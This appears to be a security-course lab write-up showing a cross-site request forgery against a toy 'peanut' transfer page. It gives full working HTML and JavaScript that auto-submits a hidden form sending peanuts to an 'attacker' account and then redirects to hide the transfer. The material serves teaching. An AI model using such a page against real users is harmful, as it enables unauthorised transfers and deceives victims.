
Attack B: Cross Site Request Forgery

This attack is a better fit for a site like PayPal or eBay, where a forged request moves real money, but the mechanics are the same here. For this example, suppose you have a transfer.php page whose form looks like this:

<form method=POST name=transferform
  action="/teaching/10WS/Security/material/projects/project2/peanut/transfer.php">
<p>Send <input name=peanuts type=text value="" size=5> peanuts</p>
<p>to <input name=recipient type=text value=""></p>
<input type=submit name=submission value="Send">
</form>

Let’s assume that there is no confirmation step when a user transfers peanuts to another user, and that the user is already logged in to the website, so the browser holds a valid session cookie. The browser attaches that cookie to every request it sends to the site, regardless of which page caused the request. The attacker can therefore construct an HTML file, lure the user into opening it, and have the user’s own browser send the peanuts to the attacker’s account.

1. Set up a fake form

In the HTML file, copy and paste the form needed to transfer the peanuts, with the recipient and peanut fields filled in by the attacker in advance. Note that the relative action below only reaches transfer.php if the file is served from the target site itself; if it is hosted anywhere else, the action must be the absolute URL of transfer.php on the target site:

<form action="/transfer.php" id="transferform"
    method="post" enctype="application/x-www-form-urlencoded">
    <input type="hidden" name="recipient" value="attacker" />
    <input type="hidden" name="peanuts" value="10" />
    <input type="hidden" name="submission" value="Send" />
 </form>

The inputs are hidden so the user sees nothing unusual while the request forgery is happening.

2. Set up an auto-submit and a redirect

Now you want the HTML file to submit the form automatically as soon as it loads, and to redirect to the site’s main page as soon as the form has been submitted, to avoid suspicion. An onLoad handler and a hidden iframe will do that: the form is submitted into the iframe, so the top-level page never visibly navigates to transfer.php, and the iframe’s load event tells you when the response has come back:

<body onLoad = "breakthrough()">
 <form action="/transfer.php" id="transferform"
    method="post" enctype="application/x-www-form-urlencoded">
    <input type="hidden" name="recipient" value="attacker" />
    <input type="hidden" name="peanuts" value="10" />
    <input type="hidden" name="submission" value="Send" />
 </form>
 <iframe id="form_target" name="form_target" style="visibility: hidden;">
 </iframe>
</body>

3. Create a JavaScript function to submit the form

The onLoad handler above calls breakthrough(); now write that JavaScript function in the head of the document:

<script type="text/javascript">
 function breakthrough() {
    var frame = document.getElementById('form_target');
    var form = document.getElementById('transferform');
    form.target = frame.name;
    frame.addEventListener('load', function() {
       window.location = "/index.php";
    }, false);
    form.submit();
 }
 </script>

The script looks up the hidden iframe and the form, then points the form’s target at the iframe by its name (form_target), so that the response from transfer.php is loaded into the iframe instead of replacing the page. It registers a load listener on the iframe that redirects the whole window to index.php once that response arrives, and finally calls form.submit(). The attacker’s page never reads the response, and if the page is hosted on another origin the same-origin policy would not let it; it does not need to, because the transfer has already been carried out by the time the response comes back. Whether the browser attaches the session cookie to a cross-site POST also depends on the cookie’s SameSite attribute: with SameSite=Lax or Strict the browser withholds it for this kind of request. As soon as the user opens the link, the peanuts are transferred to the attacker without any chance to stop the request. Hence the full code is:

<!DOCTYPE html>
<html>
 <head>
  <script type="text/javascript">
   function breakthrough() {
    var frame = document.getElementById('form_target');
    var form = document.getElementById('transferform');
    form.target = frame.name;
    frame.addEventListener('load', function() {
      window.location = "/index.php";
    }, false);
    form.submit();
   }
  </script>
 </head>
 <body onLoad = "breakthrough()">
  <form action="/transfer.php" id="transferform"
   method="post" enctype="application/x-www-form-urlencoded">
   <input type="hidden" name="recipient" value="attacker" />
   <input type="hidden" name="peanuts" value="10" />
   <input type="hidden" name="submission" value="Send" />
  </form>
  <iframe id="form_target" name="form_target" style="visibility: hidden;">
  </iframe>
 </body>
</html>